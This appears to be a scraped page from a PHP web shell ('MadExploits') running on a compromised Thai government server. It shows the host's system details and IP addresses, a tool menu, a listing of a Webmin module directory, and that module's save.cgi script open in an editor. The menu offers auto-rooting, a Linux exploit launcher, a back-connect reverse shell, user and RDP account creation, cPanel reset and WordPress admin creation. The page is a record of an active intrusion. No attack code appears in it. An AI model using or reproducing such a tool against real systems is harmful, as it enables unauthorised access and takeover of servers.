Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
webmin /
idmapd /
[ HOME SHELL ]
Name
Size
Permission
Action
help
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
CHANGELOG
129
B
-rw-r--r--
backup_config.pl
566
B
-rwxr-xr-x
config
142
B
-rw-r--r--
config.info
173
B
-rw-r--r--
config.info.ca
194
B
-rw-r--r--
config.info.ca.UTF-8
198
B
-rw-r--r--
config.info.de
202
B
-rw-r--r--
config.info.de.UTF-8
202
B
-rw-r--r--
config.info.fr
193
B
-rw-r--r--
config.info.fr.UTF-8
193
B
-rw-r--r--
config.info.nl
181
B
-rw-r--r--
config.info.nl.UTF-8
181
B
-rw-r--r--
config.info.no
183
B
-rw-r--r--
config.info.no.UTF-8
183
B
-rw-r--r--
idmapd-lib.pl
447
B
-rwxr-xr-x
index.cgi
1.72
KB
-rwxr-xr-x
install_check.pl
332
B
-rwxr-xr-x
log_parser.pl
338
B
-rwxr-xr-x
module.info
141
B
-rw-r--r--
module.info.ca
78
B
-rw-r--r--
module.info.ca.UTF-8
90
B
-rw-r--r--
module.info.cz
21
B
-rw-r--r--
module.info.cz.UTF-8
28
B
-rw-r--r--
module.info.de
72
B
-rw-r--r--
module.info.de.UTF-8
84
B
-rw-r--r--
module.info.fr
26
B
-rw-r--r--
module.info.fr.UTF-8
32
B
-rw-r--r--
module.info.ms_MY
73
B
-rw-r--r--
module.info.ms_MY.UTF-8
85
B
-rw-r--r--
module.info.nl
22
B
-rw-r--r--
module.info.nl.UTF-8
28
B
-rw-r--r--
module.info.no
22
B
-rw-r--r--
module.info.no.UTF-8
28
B
-rw-r--r--
save.cgi
868
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : save.cgi
#!/usr/bin/perl # start.cgi # Save config and restart rpc.idmapd require './idmapd-lib.pl'; &ReadParse(); &error_setup($text{'save_err', $config{'idmap_conf'}}); # Check directory -d $in{'pipefsdir'} || &error(&text('error_dir', $in{'pipefsdir'})); # Write the config file &lock_file($config{'idmapd_conf'}); open(FILE, "> $config{'idmapd_conf'}"); print FILE "[General]\n"; print FILE "Pipefs-Directory = $in{'pipefsdir'}\n"; print FILE "Domain = $in{'domain'}\n"; print FILE "\n[Mapping]\n"; print FILE "Nobody-User = $in{'nobody_user'}\n"; print FILE "Nobody-Group = $in{'nobody_group'}\n"; close(FILE); &unlock_file($config{'idmapd_conf'}); # Restart rpc.idmapd local $temp = &transname(); local $rv = &system_logged("($config{'restart_command'}) </dev/null >$temp 2>&1"); local $out = `cat $temp`; unlink($temp); if ($rv) { &error("$out"); } &redirect("");
Close